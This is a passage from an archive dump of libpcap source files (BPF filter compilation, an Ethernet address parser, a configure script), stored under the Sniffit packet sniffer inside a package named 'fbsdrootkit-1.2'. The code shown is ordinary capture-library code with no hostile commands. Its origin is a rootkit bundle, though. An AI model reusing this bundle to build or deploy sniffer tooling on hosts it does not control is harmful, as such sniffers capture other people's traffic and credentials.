BPF_ALU|BPF_MUL|BPF_X: op = "mul"; fmt = "x"; break; case BPF_ALU|BPF_DIV|BPF_X: op = "div"; fmt = "x"; break; case BPF_ALU|BPF_AND|BPF_X: op = "and"; fmt = "x"; break; case BPF_ALU|BPF_OR|BPF_X: op = "or"; fmt = "x"; break; case BPF_ALU|BPF_LSH|BPF_X: op = "lsh"; fmt = "x"; break; case BPF_ALU|BPF_RSH|BPF_X: op = "rsh"; fmt = "x"; break; case BPF_ALU|BPF_ADD|BPF_K: op = "add"; fmt = "#%d"; break; case BPF_ALU|BPF_SUB|BPF_K: op = "sub"; fmt = "#%d"; break; case BPF_ALU|BPF_MUL|BPF_K: op = "mul"; fmt = "#%d"; break; case BPF_ALU|BPF_DIV|BPF_K: op = "div"; fmt = "#%d"; break; case BPF_ALU|BPF_AND|BPF_K: op = "and"; fmt = "#%d"; break; case BPF_ALU|BPF_OR|BPF_K: op = "or"; fmt = "#%d"; break; case BPF_ALU|BPF_LSH|BPF_K: op = "lsh"; fmt = "#%d"; break; case BPF_ALU|BPF_RSH|BPF_K: op = "rsh"; fmt = "#%d"; break; case BPF_ALU|BPF_NEG: op = "neg"; fmt = ""; break; case BPF_MISC|BPF_TAX: op = "tax"; fmt = ""; break; case BPF_MISC|BPF_TXA: op = "txa"; fmt = ""; break; } (void)sprintf(operand, fmt, v); (void)sprintf(image, (BPF_CLASS(p->code) == BPF_JMP && BPF_OP(p->code) != BPF_JA) ? "(%03d) %-8s %-16s jt %d\tjf %d" : "(%03d) %-8s %s", n, op, operand, n + 1 + p->jt, n + 1 + p->jf); return image; } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/checkioctl.c100600 764 764 4677 6226213210 17133 0ustar dfdf/* * Copyright (c) 1994, 1995 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ /* @(#) $Header: checkioctl.c,v 1.3+ 95/04/08 03:14:53 leres Exp $ (LBL) */ /* * checkioctl - check to see if fixincludes has been run * * The problem we're trying to detect is that we're using gcc but * fixincludes hasn't been run. Pre-ansi ioctl macros usually * look something like: * * #define _IO(x, y) (IOC_VOID | ('x' << 8) | y) * * while ansi ioctl macros look like: * * #define _IO(x, y) (IOC_VOID | (x << 8) | y) * * The difference being that in ansi, you can't quote macro arguments. * Notice that if you use the pre-ansi macro with ansi code, the first * argument is never expanded; it always comes out as 'x' or whatever. * This program detects this. */ #include #include #ifndef SOLARIS #include #else #include #endif #include #include #include #include "pcap-int.h" #ifdef __GNUC__ int main(int, char **); #endif int main(argc, argv) int argc; char **argv; { register char *prog; if ((prog = strrchr(argv[0], '/')) != NULL) ++prog; else prog = argv[0]; #ifdef __GNUC__ if (_IO('A', 1) == _IO('B', 1)) { fprintf(stderr, "%s: You are using gcc and need to run fixincludes!\n", prog); exit(1); } #else printf("%s: You are not using gcc\n", prog); #endif exit(0); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/configure100700 764 764 6232 6226213210 16551 0ustar dfdf#!/bin/csh -f set bison set ethers set flex set gcc set gcc1 set pcap set ranlib set brokenmake if ( -e /dev/bpf0 ) then set pcap=bpf else if ( -f /usr/include/net/pfilt.h ) then set pcap=pf else if ( -e /dev/enet ) then set pcap=enet else if ( -e /dev/nit ) then set pcap=snit else if ( -f /usr/include/sys/net/nit.h ) then set pcap=nit else if ( -f /usr/include/net/raw.h ) then set pcap=snoop # must test for snoop before dlpi due to IRIX else if ( -f /usr/include/sys/dlpi.h ) then set pcap=dlpi else if ( -f /usr/include/linux/types.h ) then set pcap=linux else echo "configure: cannot determine packet capture interface" exit 1 endif echo "configure: using $pcap packet capture interface" if ( -x /bin/uname || -x /usr/bin/uname ) then set name=`uname -s | tr '[A-Z]' '[a-z]'` set vers=`uname -r | sed -e 's/\..*//' -e 's/T1/v1/' | tr '[A-Z]' '[a-z]'` if ( "$name$vers" == "sunos5") then set path=($path /usr/ccs/bin) endif else if ( -x /bin/arch ) then # sun3 only supported machine without uname if ( `/bin/arch` == sun3 ) then set name=sunos set vers=3 endif endif if ( $name == "bsd/386" || $name == "bsd/os" ) then set os=bsd else set os=$name$vers endif if ( -x /usr/local/bin/flex || -x /usr/local/flex ) then # The -V flag was added in 2.4 flex -V >& /dev/null if ($status == 0) then set flex='-e s/^#have-flex#//' echo "configure: found flex executable" else set s="version 2.4 or higher required" echo "configure: ignoring obsolete flex executable ($s)" endif else echo "configure: couldn't find flex executable; using lex" endif if ( -x /usr/local/bin/bison || -x /usr/local/bison ) then set bison='-e s/^#have-bison#//' echo "configure: found bison executable" else echo "configure: couldn't find bison executable; using yacc" endif if ( ( "$flex" == "" && "$bison" != "" ) || \ ( "$flex" != "" && "$bison" == "" ) ) then set s="reverting to lex/yacc" echo "configure: don't have both flex and bison; $s" set flex set bison endif set libc foreach f ( /usr/lib/libc.a /lib/libc.a /usr/lib/libc_s.a ) if ( -f $f ) then set libc=$f break endif end if ( "$f" == "" ) then echo "configure: couldn't find libc" else nm $libc |& grep ether_ntoa > /dev/null if ( $status == 0 ) then set ethers='-e s/^#have-ethers#//' echo "configure: found support for /etc/ethers" endif endif if ( -x /usr/local/bin/gcc || -x /usr/local/gcc ) then set gcc='-e s/^#have-gcc#//' set ver=`gcc -v |& sed -n -e '$s/.* //' -e '$s/\..*//p'` if ( "$ver" == 1 ) set gcc1='-e s/^#have-gcc1#//' endif if ( -x /usr/bin/ranlib ) then set ranlib='-e s/^#have-ranlib#//' endif if ("$os" == "ultrix4" || "$os" == "sunos3") then set brokenmake='-e s/^#have-broken-make#//' endif rm -f stdlib.h Makefile if ( ! -f /usr/include/stdlib.h ) ln -s /dev/null stdlib.h sed -e "s/^#have-$pcap#//" -e "s/^#have-$os#//" \ $flex $bison $gcc $gcc1 $ranlib $ethers $brokenmake Makefile.in > Makefile set mflags="" if ( "$gcc" != "" ) then set mflags="CC=gcc" rm -f checkioctl make checkioctl ./checkioctl set xstatus=$status rm checkioctl if ( $xstatus != 0 ) then echo "configure: bailing..." rm Makefile exit 1 endif endif chmod ug+w Makefile make depend $mflags exit 0 fbsdrootkit-1.2/sniffit.0.3.3/libpcap/configure.diff100600 764 764 526 6226213210 17437 0ustar dfdf*** ../libpcap-0.0.6~/configure Fri Apr 21 21:50:47 1995 --- configure Sat Sep 30 01:10:11 1995 *************** *** 22,25 **** --- 22,27 ---- else if ( -f /usr/include/sys/dlpi.h ) then set pcap=dlpi + else if ( -f /usr/include/linux/types.h ) then + set pcap=linux else echo "configure: cannot determine packet capture interface" fbsdrootkit-1.2/sniffit.0.3.3/libpcap/etherent.c100400 764 764 6333 6226213210 16626 0ustar dfdf/* * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint static char rcsid[] = "@(#) $Header: etherent.c,v 1.8 94/06/20 19:07:50 leres Exp $ (LBL)"; #endif #include #include #include #include #include #ifndef __GNUC__ #define inline #endif static inline int xdtoi(int); static inline int skip_space(FILE *); static inline int skip_line(FILE *); /* Hex digit to integer. */ static inline int xdtoi(c) register int c; { if (isdigit(c)) return c - '0'; else if (islower(c)) return c - 'a' + 10; else return c - 'A' + 10; } static inline int skip_space(f) FILE *f; { int c; do { c = getc(f); } while (isspace(c) && c != '\n'); return c; } static inline int skip_line(f) FILE *f; { int c; do c = getc(f); while (c != '\n' && c != EOF); return c; } struct pcap_etherent * pcap_next_etherent(FILE *fp) { register int c, d, i; char *bp; static struct pcap_etherent e; static int nline = 1; top: while (nline) { /* Find addr */ c = skip_space(fp); if (c == '\n') continue; /* If this is a comment, or first thing on line cannot be ethernet address, skip the line. */ else if (!isxdigit(c)) c = skip_line(fp); else { /* must be the start of an address */ for (i = 0; i < 6; i += 1) { d = xdtoi(c); c = getc(fp); if (c != ':') { d <<= 4; d |= xdtoi(c); c = getc(fp); } e.addr[i] = d; if (c != ':') break; c = getc(fp); } nline = 0; } if (c == EOF) return 0; } /* If we started a new line, 'c' holds the char past the ether addr, which we assume is white space. If we are continuing a line, 'c' is garbage. In either case, we can throw it away. */ c = skip_space(fp); if (c == '\n') { nline = 1; goto top; } else if (c == '#') { (void)skip_line(fp); nline = 1; goto top; } else if (c == EOF) return 0; /* Must be a name. */ bp = e.name; /* Use 'd' to prevent buffer overflow. */ d = sizeof(e.name) - 1; do { *bp++ = c; c = getc(fp); } while (!isspace(c) && c != EOF && --d > 0); *bp = '\0'; if (c == '\n') nline = 1; return &e; } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/ethertype.h100400 764 764 4364 6226213210 17030 0ustar dfdf/* * Copyright (c) 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * @(#) $Header: ethertype.h,v 1.2 94/06/14 20:03:27 leres Exp $ (LBL) */ /* Map between Ethernet protocol types and names */ /* Add other Ethernet packet types here */ #ifndef ETHERTYPE_SPRITE #define ETHERTYPE_SPRITE 0x0500 #endif #ifndef ETHERTYPE_MOPDL #define ETHERTYPE_MOPDL 0x6001 #endif #ifndef ETHERTYPE_MOPRC #define ETHERTYPE_MOPRC 0x6002 #endif #ifndef ETHERTYPE_DN #define ETHERTYPE_DN 0x6003 #endif #ifndef ETHERTYPE_LAT #define ETHERTYPE_LAT 0x6004 #endif #ifndef ETHERTYPE_LANBRIDGE #define ETHERTYPE_LANBRIDGE 0x8038 #endif #ifndef ETHERTYPE_DECDNS #define ETHERTYPE_DECDNS 0x803c #endif #ifndef ETHERTYPE_DECDTS #define ETHERTYPE_DECDTS 0x803e #endif #ifndef ETHERTYPE_VEXP #define ETHERTYPE_VEXP 0x805b #endif #ifndef ETHERTYPE_VPROD #define ETHERTYPE_VPROD 0x805c #endif #ifndef ETHERTYPE_LOOPBACK #define ETHERTYPE_LOOPBACK 0x9000 #endif #ifndef ETHERTYPE_ATALK #define ETHERTYPE_ATALK 0x809b /* XXX */ #endif #ifndef ETHERTYPE_AARP #define ETHERTYPE_AARP 0x80f3 #endif #ifndef ETHERTYPE_NS #define ETHERTYPE_NS 0x0600 #endif #ifndef ETHERTYPE_REVARP #define ETHERTYPE_REVARP 0x8035 #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/gencode.c100400 764 764 101175 6226213210 16454 0ustar dfdf/* * Copyright (c) 1990, 1991, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint static char rcsid[] = "@(#) $Header: gencode.c,v 1.55 94/06/20 19:07:53 leres Exp $ (LBL)"; #endif #include #include #include #include #include #include #include #include #include #include #include #if __STDC__ #include #include #else #include #endif #include "gencode.h" #ifndef __GNUC__ #define inline #endif #ifndef ETHERTYPE_REVARP #define ETHERTYPE_REVARP 0x8035 #endif #ifndef ETHERTYPE_MOPDL #define ETHERTYPE_MOPDL 0x6001 #endif #ifndef ETHERTYPE_MOPRC #define ETHERTYPE_MOPRC 0x6002 #endif #ifndef ETHERTYPE_DN #define ETHERTYPE_DN 0x6003 #endif #ifndef ETHERTYPE_LAT #define ETHERTYPE_LAT 0x6004 #endif #define JMP(c) ((c)|BPF_JMP|BPF_K) static jmp_buf top_ctx; static pcap_t *bpf_pcap; /* VARARGS */ volatile void #if __STDC__ || defined(SOLARIS) bpf_error(char *fmt, ...) #else bpf_error(fmt, va_alist) char *fmt; va_dcl #endif { va_list ap; #if __STDC__ va_start(ap, fmt); #else va_start(ap); #endif if (bpf_pcap != NULL) (void)vsprintf(pcap_geterr(bpf_pcap), fmt, ap); va_end(ap); longjmp(top_ctx, 1); /* NOTREACHED */ } static void init_linktype(int); static int alloc_reg(void); static void free_reg(int); static struct block *root; /* * We divy out chunks of memory rather than call malloc each time so * we don't have to worry about leaking memory. It's probably * not a big deal if all this memory was wasted but it this ever * goes into a library that would probably not be a good idea. */ #define NCHUNKS 16 #define CHUNK0SIZE 1024 struct chunk { u_int n_left; void *m; }; static struct chunk chunks[NCHUNKS]; static int cur_chunk; static void *newchunk(u_int); static void freechunks(void); static inline struct block *new_block(int); static inline struct slist *new_stmt(int); static struct block *gen_retblk(int); static inline void syntax(void); static void backpatch(struct block *, struct block *); static void merge(struct block *, struct block *); static struct block *gen_cmp(u_int, u_int, long); static struct block *gen_mcmp(u_int, u_int, long, u_long); static struct block *gen_bcmp(u_int, u_int, u_char *); static struct block *gen_uncond(int); static inline struct block *gen_true(void); static inline struct block *gen_false(void); static struct block *gen_linktype(int); static struct block *gen_hostop(u_long, u_long, int, int, u_int, u_int); static struct block *gen_ehostop(u_char *, int); #ifdef FDDI static struct block *gen_fhostop(u_char *, int); #endif static struct block *gen_dnhostop(u_long, int, u_int); static struct block *gen_host(u_long, u_long, int, int); static struct block *gen_gateway(u_char *, u_long **, int, int); static struct block *gen_ipfrag(void); static struct block *gen_portatom(int, long); struct block *gen_portop(int, int, int); static struct block *gen_port(int, int, int); static int lookup_proto(char *, int); static struct block *gen_proto(int, int, int); static u_long net_mask(u_long *); static u_long net_mask(u_long *); static struct slist *xfer_to_x(struct arth *); static struct slist *xfer_to_a(struct arth *); static struct block *gen_len(int, int); static void * newchunk(n) u_int n; { struct chunk *cp; int k, size; /* XXX Round up to nearest long. */ n = (n + sizeof(long) - 1) & ~(sizeof(long) - 1); cp = &chunks[cur_chunk]; if (n > cp->n_left) { ++cp, k = ++cur_chunk; if (k >= NCHUNKS) bpf_error("out of memory"); size = CHUNK0SIZE << k; cp->m = (void *)malloc(size); memset((char *)cp->m, 0, size); cp->n_left = size; if (n > size) bpf_error("out of memory"); } cp->n_left -= n; return (void *)((char *)cp->m + cp->n_left); } static void freechunks() { int i; for (i = 0; i < NCHUNKS; ++i) if (chunks[i].m) free(chunks[i].m); } /* * A strdup whose allocations are freed after code generation is over. */ char * sdup(s) char *s; { int n = strlen(s) + 1; char *cp = newchunk(n); strcpy(cp, s); return (cp); } static inline struct block * new_block(code) int code; { struct block *p; p = (struct block *)newchunk(sizeof(*p)); p->s.code = code; p->head = p; return p; } static inline struct slist * new_stmt(code) int code; { struct slist *p; p = (struct slist *)newchunk(sizeof(*p)); p->s.code = code; return p; } static struct block * gen_retblk(v) int v; { struct block *b = new_block(BPF_RET|BPF_K); b->s.k = v; return b; } static inline void syntax() { bpf_error("syntax error in filter expression"); } static u_long netmask; static int snaplen; int pcap_compile(pcap_t *p, struct bpf_program *program, char *buf, int optimize, u_long mask) { extern int n_errors; int len; bpf_pcap = p; if (setjmp(top_ctx)) return (-1); netmask = mask; snaplen = pcap_snapshot(p); lex_init(buf ? buf : ""); init_linktype(pcap_datalink(p)); pcap_parse(); if (n_errors) syntax(); if (root == NULL) root = gen_retblk(snaplen); if (optimize) { bpf_optimize(&root); if (root == NULL || (root->s.code == (BPF_RET|BPF_K) && root->s.k == 0)) bpf_error("expression rejects all packets"); } program->bf_insns = icode_to_fcode(root, &len); program->bf_len = len; freechunks(); return (0); } /* * Backpatch the blocks in 'list' to 'target'. The 'sense' field indicates * which of the jt and jf fields has been resolved and which is a pointer * back to another unresolved block (or nil). At least one of the fields * in each block is already resolved. */ static void backpatch(list, target) struct block *list, *target; { struct block *next; while (list) { if (!list->sense) { next = JT(list); JT(list) = target; } else { next = JF(list); JF(list) = target; } list = next; } } /* * Merge the lists in b0 and b1, using the 'sense' field to indicate * which of jt and jf is the link. */ static void merge(b0, b1) struct block *b0, *b1; { register struct block **p = &b0; /* Find end of list. */ while (*p) p = !((*p)->sense) ? &JT(*p) : &JF(*p); /* Concatenate the lists. */ *p = b1; } void finish_parse(p) struct block *p; { backpatch(p, gen_retblk(snaplen)); p->sense = !p->sense; backpatch(p, gen_retblk(0)); root = p->head; } void gen_and(b0, b1) struct block *b0, *b1; { backpatch(b0, b1->head); b0->sense = !b0->sense; b1->sense = !b1->sense; merge(b1, b0); b1->sense = !b1->sense; b1->head = b0->head; } void gen_or(b0, b1) struct block *b0, *b1; { b0->sense = !b0->sense; backpatch(b0, b1->head); b0->sense = !b0->sense; merge(b1, b0); b1->head = b0->head; } void gen_not(b) struct block *b; { b->sense = !b->sense; } static struct block * gen_cmp(offset, size, v) u_int offset, size; long v; { struct slist *s; struct block *b; s = new_stmt(BPF_LD|BPF_ABS|size); s->s.k = offset; b = new_block(JMP(BPF_JEQ)); b->stmts = s; b->s.k = v; return b; } static struct block * gen_mcmp(offset, size, v, mask) u_int offset, size; long v; u_long mask; { struct block *b = gen_cmp(offset, size, v); struct slist *s; if (mask != 0xffffffff) { s = new_stmt(BPF_ALU|BPF_AND|BPF_K); s->s.k = mask; b->stmts->next = s; } return b; } static struct block * gen_bcmp(offset, size, v) u_int offset, size; u_char *v; { struct block *b, *tmp; b = NULL; while (size >= 4) { u_char *p = &v[size - 4]; long w = (p[0] << 24) | (p[1] << 16) | (p[2] << 8) | p[3]; tmp = gen_cmp(offset + size - 4, BPF_W, w); if (b != NULL) gen_and(b, tmp); b = tmp; size -= 4; } while (size >= 2) { u_char *p = &v[size - 2]; long w = (p[0] << 8) | p[1]; tmp = gen_cmp(offset + size - 2, BPF_H, w); if (b != NULL) gen_and(b, tmp); b = tmp; size -= 2; } if (size > 0) { tmp = gen_cmp(offset, BPF_B, (long)v[0]); if (b != NULL) gen_and(b, tmp); b = tmp; } return b; } /* * Various code constructs need to know the layout of the data link * layer. These variables give the necessary offsets. off_linktype * is set to -1 for no encapsulation, in which case, IP is assumed. */ static u_int off_linktype; static u_int off_nl; static int linktype; #ifdef FDDI extern int fddipad; #endif static void init_linktype(type) int type; { linktype = type; switch (type) { case DLT_EN10MB: off_linktype = 12; off_nl = 14; return; case DLT_SLIP: /* * SLIP doesn't have a link level type. The 16 byte * header is hacked into our SLIP driver. */ off_linktype = -1; off_nl = 16; return; case DLT_NULL: off_linktype = -1; off_nl = 0; return; case DLT_PPP: off_linktype = 2; off_nl = 4; return; #ifdef FDDI case DLT_FDDI: /* * FDDI doesn't really have a link-level type field. * We assume that SSAP = SNAP is being used and pick * out the encapsulated Ethernet type. */ off_linktype = 19 + fddipad; off_nl = 21 + fddipad; return; #endif case DLT_IEEE802: off_linktype = 20; off_nl = 22; return; } bpf_error("unknown data link type 0x%x", linktype); /* NOTREACHED */ } static struct block * gen_uncond(rsense) int rsense; { struct block *b; struct slist *s; s = new_stmt(BPF_LD|BPF_IMM); s->s.k = !rsense; b = new_block(JMP(BPF_JEQ)); b->stmts = s; return b; } static inline struct block * gen_true() { return gen_uncond(1); } static inline struct block * gen_false() { return gen_uncond(0); } static struct block * gen_linktype(proto) int proto; { switch (linktype) { case DLT_SLIP: if (proto == ETHERTYPE_IP) return gen_true(); else return gen_false(); case DLT_PPP: if (proto == ETHERTYPE_IP) proto = 0x0021; /* XXX - need ppp.h defs */ break; } return gen_cmp(off_linktype, BPF_H, (long)proto); } static struct block * gen_hostop(addr, mask, dir, proto, src_off, dst_off) u_long addr; u_long mask; int dir, proto; u_int src_off, dst_off; { struct block *b0, *b1; u_int offset; switch (dir) { case Q_SRC: offset = src_off; break; case Q_DST: offset = dst_off; break; case Q_AND: b0 = gen_hostop(addr, mask, Q_SRC, proto, src_off, dst_off); b1 = gen_hostop(addr, mask, Q_DST, proto, src_off, dst_off); gen_and(b0, b1); return b1; case Q_OR: case Q_DEFAULT: b0 = gen_hostop(addr, mask, Q_SRC, proto, src_off, dst_off); b1 = gen_hostop(addr, mask, Q_DST, proto, src_off, dst_off); gen_or(b0, b1); return b1; default: abort(); } b0 = gen_linktype(proto); b1 = gen_mcmp(offset, BPF_W, (long)addr, mask); gen_and(b0, b1); return b1; } static struct block * gen_ehostop(eaddr, dir) u_char *eaddr; int dir; { struct block *b0, *b1; switch (dir) { case Q_SRC: return gen_bcmp(6, 6, eaddr); case Q_DST: return gen_bcmp(0, 6, eaddr); case Q_AND: b0 = gen_ehostop(eaddr, Q_SRC); b1 = gen_ehostop(eaddr, Q_DST); gen_and(b0, b1); return b1; case Q_DEFAULT: case Q_OR: b0 = gen_ehostop(eaddr, Q_SRC); b1 = gen_ehostop(eaddr, Q_DST); gen_or(b0, b1); return b1; } abort(); /* NOTREACHED */ } #ifdef FDDI /* * Like gen_ehostop, but for DLT_FDDI */ static struct block * gen_fhostop(eaddr, dir) u_char *eaddr; int dir; { struct block *b0, *b1; switch (dir) { case Q_SRC: return gen_bcmp(6 + 1 + fddipad, 6, eaddr); case Q_DST: return gen_bcmp(0 + 1 + fddipad, 6, eaddr); case Q_AND: b0 = gen_fhostop(eaddr, Q_SRC); b1 = gen_fhostop(eaddr, Q_DST); gen_and(b0, b1); return b1; case Q_DEFAULT: case Q_OR: b0 = gen_fhostop(eaddr, Q_SRC); b1 = gen_fhostop(eaddr, Q_DST); gen_or(b0, b1); return b1; } abort(); /* NOTREACHED */ } #endif /* * This is quite tricky because there may be pad bytes in front of the * DECNET header, and then there are two possible data packet formats that * carry both src and dst addresses, plus 5 packet types in a format that * carries only the src node, plus 2 types that use a different format and * also carry just the src node. * * Yuck. * * Instead of doing those all right, we just look for data packets with * 0 or 1 bytes of padding. If you want to look at other packets, that * will require a lot more hacking. * * To add support for filtering on DECNET "areas" (network numbers) * one would want to add a "mask" argument to this routine. That would * make the filter even more inefficient, although one could be clever * and not generate masking instructions if the mask is 0xFFFF. */ static struct block * gen_dnhostop(addr, dir, base_off) u_long addr; int dir; u_int base_off; { struct block *b0, *b1, *b2, *tmp; u_int offset_lh; /* offset if long header is received */ u_int offset_sh; /* offset if short header is received */ switch (dir) { case Q_DST: offset_sh = 1; /* follows flags */ offset_lh = 7; /* flgs,darea,dsubarea,HIORD */ break; case Q_SRC: offset_sh = 3; /* follows flags, dstnode */ offset_lh = 15; /* flgs,darea,dsubarea,did,sarea,ssub,HIORD */ break; case Q_AND: /* Inefficient because we do our Calvinball dance twice */ b0 = gen_dnhostop(addr, Q_SRC, base_off); b1 = gen_dnhostop(addr, Q_DST, base_off); gen_and(b0, b1); return b1; case Q_OR: case Q_DEFAULT: /* Inefficient because we do our Calvinball dance twice */ b0 = gen_dnhostop(addr, Q_SRC, base_off); b1 = gen_dnhostop(addr, Q_DST, base_off); gen_or(b0, b1); return b1; default: abort(); } b0 = gen_linktype(ETHERTYPE_DN); /* Check for pad = 1, long header case */ tmp = gen_mcmp(base_off + 2, BPF_H, (long)ntohs(0x0681), (long)ntohs(0x07FF)); b1 = gen_cmp(base_off + 2 + 1 + offset_lh, BPF_H, (long)ntohs(addr)); gen_and(tmp, b1); /* Check for pad = 0, long header case */ tmp = gen_mcmp(base_off + 2, BPF_B, (long)0x06, (long)0x7); b2 = gen_cmp(base_off + 2 + offset_lh, BPF_H, (long)ntohs(addr)); gen_and(tmp, b2); gen_or(b2, b1); /* Check for pad = 1, short header case */ tmp = gen_mcmp(base_off + 2, BPF_H, (long)ntohs(0x0281), (long)ntohs(0x07FF)); b2 = gen_cmp(base_off + 2 + 1 + offset_sh, BPF_H, (long)ntohs(addr)); gen_and(tmp, b2); gen_or(b2, b1); /* Check for pad = 0, short header case */ tmp = gen_mcmp(base_off + 2, BPF_B, (long)0x02, (long)0x7); b2 = gen_cmp(base_off + 2 + offset_sh, BPF_H, (long)ntohs(addr)); gen_and(tmp, b2); gen_or(b2, b1); /* Combine with test for linktype */ gen_and(b0, b1); return b1; } static struct block * gen_host(addr, mask, proto, dir) u_long addr; u_long mask; int proto; int dir; { struct block *b0, *b1; switch (proto) { case Q_DEFAULT: b0 = gen_host(addr, mask, Q_IP, dir); b1 = gen_host(addr, mask, Q_ARP, dir); gen_or(b0, b1); b0 = gen_host(addr, mask, Q_RARP, dir); gen_or(b1, b0); return b0; case Q_IP: return gen_hostop(addr, mask, dir, ETHERTYPE_IP, off_nl + 12, off_nl + 16); case Q_RARP: return gen_hostop(addr, mask, dir, ETHERTYPE_REVARP, off_nl + 14, off_nl + 24); case Q_ARP: return gen_hostop(addr, mask, dir, ETHERTYPE_ARP, off_nl + 14, off_nl + 24); case Q_TCP: bpf_error("'tcp' modifier applied to host"); case Q_UDP: bpf_error("'udp' modifier applied to host"); case Q_ICMP: bpf_error("'icmp' modifier applied to host"); case Q_DECNET: return gen_dnhostop(addr, dir, off_nl); case Q_LAT: bpf_error("LAT host filtering not implemented"); case Q_MOPDL: bpf_error("MOPDL host filtering not implemented"); case Q_MOPRC: bpf_error("MOPRC host filtering not implemented"); default: abort(); } /* NOTREACHED */ } static struct block * gen_gateway(eaddr, alist, proto, dir) u_char *eaddr; u_long **alist; int proto; int dir; { struct block *b0, *b1, *tmp; if (dir != 0) bpf_error("direction applied to 'gateway'"); switch (proto) { case Q_DEFAULT: case Q_IP: case Q_ARP: case Q_RARP: if (linktype == DLT_EN10MB) b0 = gen_ehostop(eaddr, Q_OR); #ifdef FDDI else if (linktype == DLT_FDDI) b0 = gen_fhostop(eaddr, Q_OR); #endif else bpf_error("'gateway' supported only on ethernet or FDDI"); b1 = gen_host(**alist++, 0xffffffffL, proto, Q_OR); while (*alist) { tmp = gen_host(**alist++, 0xffffffffL, proto, Q_OR); gen_or(b1, tmp); b1 = tmp; } gen_not(b1); gen_and(b0, b1); return b1; } bpf_error("illegal modifier of 'gateway'"); /* NOTREACHED */ } struct block * gen_proto_abbrev(proto) int proto; { struct block *b0, *b1; switch (proto) { case Q_TCP: b0 = gen_linktype(ETHERTYPE_IP); b1 = gen_cmp(off_nl + 9, BPF_B, (long)IPPROTO_TCP); gen_and(b0, b1); break; case Q_UDP: b0 = gen_linktype(ETHERTYPE_IP); b1 = gen_cmp(off_nl + 9, BPF_B, (long)IPPROTO_UDP); gen_and(b0, b1); break; case Q_ICMP: b0 = gen_linktype(ETHERTYPE_IP); b1 = gen_cmp(off_nl + 9, BPF_B, (long)IPPROTO_ICMP); gen_and(b0, b1); break; case Q_IP: b1 = gen_linktype(ETHERTYPE_IP); break; case Q_ARP: b1 = gen_linktype(ETHERTYPE_ARP); break; case Q_RARP: b1 = gen_linktype(ETHERTYPE_REVARP); break; case Q_LINK: bpf_error("link layer applied in wrong context"); case Q_DECNET: b1 = gen_linktype(ETHERTYPE_DN); break; case Q_LAT: b1 = gen_linktype(ETHERTYPE_LAT); break; case Q_MOPDL: b1 = gen_linktype(ETHERTYPE_MOPDL); break; case Q_MOPRC: b1 = gen_linktype(ETHERTYPE_MOPRC); break; default: abort(); } return b1; } static struct block * gen_ipfrag() { struct slist *s; struct block *b; /* not ip frag */ s = new_stmt(BPF_LD|BPF_H|BPF_ABS); s->s.k = off_nl + 6; b = new_block(JMP(BPF_JSET)); b->s.k = 0x1fff; b->stmts = s; gen_not(b); return b; } static struct block * gen_portatom(off, v) int off; long v; { struct slist *s; struct block *b; s = new_stmt(BPF_LDX|BPF_MSH|BPF_B); s->s.k = off_nl; s->next = new_stmt(BPF_LD|BPF_IND|BPF_H); s->next->s.k = off_nl + off; b = new_block(JMP(BPF_JEQ)); b->stmts = s; b->s.k = v; return b; } struct block * gen_portop(port, proto, dir) int port, proto, dir; { struct block *b0, *b1, *tmp; /* ip proto 'proto' */ tmp = gen_cmp(off_nl + 9, BPF_B, (long)proto); b0 = gen_ipfrag(); gen_and(tmp, b0); switch (dir) { case 